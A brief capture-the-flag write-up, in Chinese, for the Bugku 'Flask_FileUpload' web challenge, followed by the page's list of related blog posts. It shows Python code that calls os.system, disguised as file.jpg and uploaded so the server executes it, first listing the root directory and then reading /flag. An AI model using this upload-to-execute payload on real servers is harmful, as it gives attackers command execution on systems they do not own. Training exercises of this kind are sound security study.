Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
zhoutongsheng7 小时前
mysql触发器可以自定义错误消息吗_mysql错误处理机制
jvm·数据库·python
@王先生17 小时前
【K8S-ETCD初始化三节点集群】
前端·chrome·k8s·etcd·集群
Metaphor6927 小时前
使用 Python 给 Word 文档设置背景
python·word
2401_898717667 小时前
Go语言如何用systemd_Go语言systemd服务管理教程【总结】
jvm·数据库·python
X56618 小时前
SQL如何进行复杂逻辑下的分组求和_使用子查询方案
jvm·数据库·python
北冥有羽Victoria8 小时前
Django中间件实战:FBV/CBV日志全兼容
数据库·vscode·后端·python·django·sqlite·开源
ㄟ留恋さ寂寞8 小时前
如何授权AWR报告生成_GRANT SELECT ANY DICTIONARY诊断权限
jvm·数据库·python
_376271538 小时前
mysql如何实现定时清理缓存数据_利用event scheduler执行
jvm·数据库·python
m0_748554818 小时前
SQL如何实现多层级分组统计_使用GROUP BY多字段组合
jvm·数据库·python
LinDaiDai_霖呆呆8 小时前
做 Agent 开发入门必懂的 10 个 Agent 核心概念
前端·agent·ai编程
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04零基础教你claude code 接入 deepseek V405【AI】2026 年具身智能模型和世界模型总结06Windows端Codex接入第三方模型(DeekSeek,BaiLian)07Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)08要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法09codex app每次打开重连5次Reconnecting问题解决10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法